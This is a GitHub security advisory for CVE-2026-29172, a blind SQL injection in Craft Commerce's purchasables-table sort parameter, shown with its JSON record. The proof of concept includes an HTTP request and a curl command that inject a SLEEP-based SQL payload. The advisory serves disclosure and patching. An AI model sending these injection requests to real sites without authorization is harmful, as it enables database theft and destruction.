GHSA-J3X5-MGHF-XVFW

Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:55
VLAI?
Summary
Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting
Details

Summary

Craft Commerce is vulnerable to SQL Injection in the purchasables table endpoint. The sort parameter is split by | and the first part (column name) is passed directly as an array key to orderBy() without whitelist validation. Yii2's query builder does NOT escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the ORDER BY clause.

PoC

Required Permissions

  • General
    • Access the control panel
    • Access Craft Commerce
  • Craft Commerce
    • Manage orders
    • Edit orders

Steps to reproduce

  1. Log in to the control panel
  2. Navigate to Commerce > Orders > Create a new order
  3. Click on "Add a line item" to show the purchasables table
  4. Intercept the AJAX request and modify the sort parameter as follows:
GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc
  1. Observe the delay in the response, confirming the injection

Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):

curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc'

Impact

With this Blind SQLi, an attacker can: - Exfiltrate data character-by-character (same technique as GHSA-pmgj-gmm4-jh6j). - Modify or destroy data (drop tables, update records, alter schema).

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.10.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29172"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:23:07Z",
    "nvd_published_at": "2026-03-10T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nCraft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split by `|` and the first part (column name) is passed directly as an array key to `orderBy()` without whitelist validation. Yii2\u0027s query builder does **NOT** escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the `ORDER BY` clause.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage orders\n\t- Edit orders\n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** \u003e **Orders** \u003e Create a new order\n3. Click on \"Add a line item\" to show the purchasables table\n4. Intercept the AJAX request and modify the `sort` parameter as follows:\n```http\nGET /index.php?p=admin/actions/commerce/orders/purchasables-table\u0026siteId=1\u0026sort=id,(SELECT%20SLEEP(2))|asc\n```\n5. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table\u0026siteId=1\u0026sort=id,(SELECT%20SLEEP(5))|asc\u0027\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)).\n- **Modify or destroy data** (drop tables, update records, alter schema).",
  "id": "GHSA-j3x5-mghf-xvfw",
  "modified": "2026-03-10T22:55:11Z",
  "published": "2026-03-10T18:23:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-j3x5-mghf-xvfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29172"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/b231b920b73db023e81e5b261b894d73e865c276"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/e4e0f4107cd895d29290523637f077fe280407b1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.